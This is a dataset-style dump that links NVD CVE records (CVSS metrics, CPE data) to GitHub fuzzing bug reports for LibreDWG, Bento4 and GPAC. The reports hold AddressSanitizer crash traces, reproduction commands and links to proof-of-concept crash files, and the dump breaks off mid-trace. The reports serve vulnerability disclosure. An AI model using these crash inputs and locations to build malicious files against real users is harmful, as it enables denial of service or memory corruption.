cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringlengths
39
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
58
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
39
62
issue_github_id
int64
128M
2.09B
issue_number
int64
1
122k
CVE-2022-33032
2022-06-23T17:15:14.190
LibreDWG v0.12.4.4608 was discovered to contain a heap-buffer-overflow via the function decode_preR13_section_hdr at decode_r11.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/488" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:-:*:*:*:*:*:*:*", "matchCriteriaId": "6FE47054-8B69-4569-934E-EE67FC88DD36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/488
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==8993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000144 at pc 0x0000007064dc bp 0x7fffffffca00 sp 0x7fffffffc9f8 WRITE of size 4 at 0x611000000144 thread T0 #0 0x7064db in decode_preR13_section_hdr /testcase/libredwg/src/decode_r11.c:136:13 #1 0x70583b in decode_preR13 /testcase/libredwg/src/decode_r11.c:737:12 #2 0x53245a in dwg_decode /testcase/libredwg/src/decode.c:209:23 #3 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #4 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #5 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x611000000144 is located 4 bytes to the right of 256-byte region [0x611000000040,0x611000000140) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x7055f0 in decode_preR13 /testcase/libredwg/src/decode_r11.c:700:40 #2 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #3 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #4 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /testcase/libredwg/src/decode_r11.c:136:13 in decode_preR13_section_hdr Shadow bytes around the buggy address: 0x0c227fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8020: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c227fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==8993==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/decode_preR13_section_hdr_bof
heap-buffer-overflow exists in the function decode_preR13_section_hdr in decode_r11.c
https://api.github.com/repos/LibreDWG/libredwg/issues/488/comments
3
2022-06-07T01:34:49Z
2022-12-15T08:43:05Z
https://github.com/LibreDWG/libredwg/issues/488
1,262,611,394
488
CVE-2022-33033
2022-06-23T17:15:14.230
LibreDWG v0.12.4.4608 was discovered to contain a double-free via the function dwg_read_file at dwg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/493" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*", "matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/493
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==9541==ERROR: AddressSanitizer: attempting double-free on 0x61a000000100 in thread T0: #0 0x4d23a0 in __interceptor_cfree.localalias.0 /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55 #1 0x50d77a in dwg_read_file /testcase/libredwg/src/dwg.c:258:7 #2 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #3 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) 0x61a000000100 is located 128 bytes inside of 1321-byte region [0x61a000000080,0x61a0000005a9) allocated by thread T0 here: #0 0x4d2750 in calloc /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74 #1 0x50cdd0 in dat_read_file /testcase/libredwg/src/dwg.c:91:33 #2 0x50d708 in dwg_read_file /testcase/libredwg/src/dwg.c:247:15 #3 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #4 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: double-free /fuzzer/build/llvm_tools/llvm-4.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55 in __interceptor_cfree.localalias.0 ==9541==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/dwg_read_file_df
double-free exists in the function dwg_read_file in dwg.c
https://api.github.com/repos/LibreDWG/libredwg/issues/493/comments
2
2022-06-08T01:47:21Z
2022-12-01T08:12:49Z
https://github.com/LibreDWG/libredwg/issues/493
1,264,080,771
493
CVE-2022-33034
2022-06-23T17:15:14.270
LibreDWG v0.12.4.4608 was discovered to contain a stack overflow via the function copy_bytes at decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/494" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.4.4608:*:*:*:*:*:*:*", "matchCriteriaId": "205AD0A5-0F64-4F38-A208-B41F8C1E8952", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/494
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
### system info Ubuntu x86_64, clang 6.0, dwg2dxf([0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608)) ### Command line ./programs/dwg2dxf -b -m @@ -o /dev/null ### AddressSanitizer output ==9543==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffc8f0 at pc 0x0000007257bb bp 0x7fffffffbc90 sp 0x7fffffffbc88 WRITE of size 1 at 0x7fffffffc8f0 thread T0 #0 0x7257ba in copy_bytes /testcase/libredwg/src/decode_r2007.c:228:12 #1 0x7257ba in decompress_r2007 /testcase/libredwg/src/decode_r2007.c:563 #2 0x712263 in read_file_header /testcase/libredwg/src/decode_r2007.c:1247:13 #3 0x712263 in read_r2007_meta_data /testcase/libredwg/src/decode_r2007.c:2354 #4 0x533116 in decode_R2007 /testcase/libredwg/src/decode.c:3231:11 #5 0x533116 in dwg_decode /testcase/libredwg/src/decode.c:212 #6 0x50d759 in dwg_read_file /testcase/libredwg/src/dwg.c:254:11 #7 0x50c454 in main /testcase/libredwg/programs/dwg2dxf.c:258:15 #8 0x7ffff6e22c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x419ee9 in _start (/testcase/libredwg/programs/dwg2dxf+0x419ee9) Address 0x7fffffffc8f0 is located in stack of thread T0 at offset 2736 in frame #0 0x71159f in read_r2007_meta_data /testcase/libredwg/src/decode_r2007.c:2338 This frame has 23 object(s): [32, 40) 'acis_sab_data.i.i' [64, 65) 'acis_empty.i.i' [80, 82) 'version1913.i.i' [96, 100) 'size1930.i.i' [112, 160) 'sec_dat.i548' [192, 240) 'sec_dat.i515' [272, 320) 'sec_dat.i492' [352, 400) 'sec_dat.i455' [432, 480) 'sec_dat.i424' [512, 560) 'sec_dat.i391' [592, 640) 'sec_dat.i356' [672, 720) 'sec_dat.i330' [752, 800) 'sec_dat.i301' [832, 836) 'size.i282' [848, 873) 'old_dat.sroa.0.i' [912, 960) 'sec_dat.i268' [992, 1040) 'sec_dat.i220' [1072, 1120) 'str.i' [1152, 1200) 'sec_dat.i' [1232, 1280) 'str_dat.i' [1312, 1320) 'ptr.i' [1344, 2328) 'data.i' [2464, 2736) 'file_header' <== Memory access at offset 2736 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /testcase/libredwg/src/decode_r2007.c:228:12 in copy_bytes Shadow bytes around the buggy address: 0x10007fff78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff78e0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 0x10007fff78f0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 0x10007fff7900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3 0x10007fff7920: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==9543==ABORTING ### poc https://gitee.com/cxlzff/fuzz-poc/raw/master/libredwg/copy_bytes_sof
stack-buffer-overflow exists in the function copy_bytes in decode_r2007.c
https://api.github.com/repos/LibreDWG/libredwg/issues/494/comments
3
2022-06-08T01:51:23Z
2022-12-15T08:47:23Z
https://github.com/LibreDWG/libredwg/issues/494
1,264,082,849
494
CVE-2021-40941
2022-06-27T18:15:08.803
In Bento4 1.6.0-638, there is an allocator is out of memory in the function AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity in Ap4Array.h:172, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/644" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*", "matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/644
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
How to reproduce: ``` 1.check out latest code, 5922ba762a 2.compile with asan, set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") 3.run ./mp4dump --verbosity 3 --format text poc1 ``` [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/7043113/poc1.zip) You can see the asan information below: ``` ==634578==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8000000f0 bytes #0 0x34eabd in operator new(unsigned long) (/home/lly/pro/Bento4/cmakebuild/mp4dump+0x34eabd) #1 0x54535c in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) /home/lly/pro/Bento4/Source/C++/Core/Ap4Array.h:172:25 #2 0x54535c in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/lly/pro/Bento4/Source/C++/Core/Ap4Array.h:210:25 #3 0x54535c in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/lly/pro/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127:15 #4 0x5445a4 in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/lly/pro/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51:16 #5 0x37cc25 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438:20 #6 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #7 0x3a062f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #8 0x39f40a in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #9 0x39f40a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #10 0x37c5ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #11 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #12 0x3a062f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #13 0x39f40a in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139:5 #14 0x39f40a in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88:20 #15 0x37c5ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816:20 #16 0x383d06 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #17 0x38333b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/lly/pro/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #18 0x359a7e in main /home/lly/pro/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342:25 #19 0x7f6cf702a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 ```
allocator is out of memory in Ap4Array.h:172
https://api.github.com/repos/axiomatic-systems/Bento4/issues/644/comments
0
2021-08-25T02:03:31Z
2021-09-08T02:36:45Z
https://github.com/axiomatic-systems/Bento4/issues/644
978,628,921
644
CVE-2021-40942
2022-06-27T21:15:07.900
In GPAC MP4Box v1.1.0, there is a heap-buffer-overflow in the function filter_parse_dyn_args function in filter_core/filter.c:1454, as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1908" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1908
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...) Step to reproduce: ``` 1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master) 2.compile with --enable-sanitizer 3.make 5 dirs which every of them has a large name(length=255), this makes the file's abs-path lengh larger than 1024, we called it large.nhml 4.run MP4Box -add {path to large.nhml} -new new.mp4 ``` Env: Ubunut 20.04 , clang 12.0.1 My cmd line an ASAN report MP4Box -add ~/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/12341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341231234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123412341234123/large.nhml -new new.mp4 ``` ==2343764==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00000a7a1 at pc 0x7fb8ca3e675d bp 0x7ffd40a5e9d0 sp 0x7ffd40a5e9c8 WRITE of size 1 at 0x61a00000a7a1 thread T0 #0 0x7fb8ca3e675c in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 #1 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2 #2 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2 #3 0x7fb8ca3cc58a in gf_filter_new /home/lly/pro/gpac_public/src/filter_core/filter.c:382:7 #4 0x7fb8ca3c3d27 in gf_fs_load_source_dest_internal /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2845:12 #5 0x7fb8ca3c47b0 in gf_fs_load_source /home/lly/pro/gpac_public/src/filter_core/filter_session.c:2885:9 #6 0x7fb8c9f97e29 in gf_media_import /home/lly/pro/gpac_public/src/media_tools/media_import.c:1469:11 #7 0x50522f in import_file /home/lly/pro/gpac_public/applications/mp4box/fileimport.c:1289:7 #8 0x4e1a09 in do_add_cat /home/lly/pro/gpac_public/applications/mp4box/main.c:4257:10 #9 0x4e79ca in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5746:13 #10 0x4ea7ca in main /home/lly/pro/gpac_public/applications/mp4box/main.c:6456:1 #11 0x7fb8c92ba0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x429a8d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a8d) 0x61a00000a7a1 is located 0 bytes to the right of 1313-byte region [0x61a00000a280,0x61a00000a7a1) allocated by thread T0 here: #0 0x4a4c69 in realloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a4c69) #1 0x7fb8ca3e529d in filter_parse_dyn_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1451:12 #2 0x7fb8ca3cf6dc in gf_filter_parse_args /home/lly/pro/gpac_public/src/filter_core/filter.c:1726:2 #3 0x7fb8ca3cdbe0 in gf_filter_new_finalize /home/lly/pro/gpac_public/src/filter_core/filter.c:418:2 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/filter_core/filter.c:1454:13 in filter_parse_dyn_args Shadow bytes around the buggy address: 0x0c347fff94a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c347fff94e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c347fff94f0: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9520: 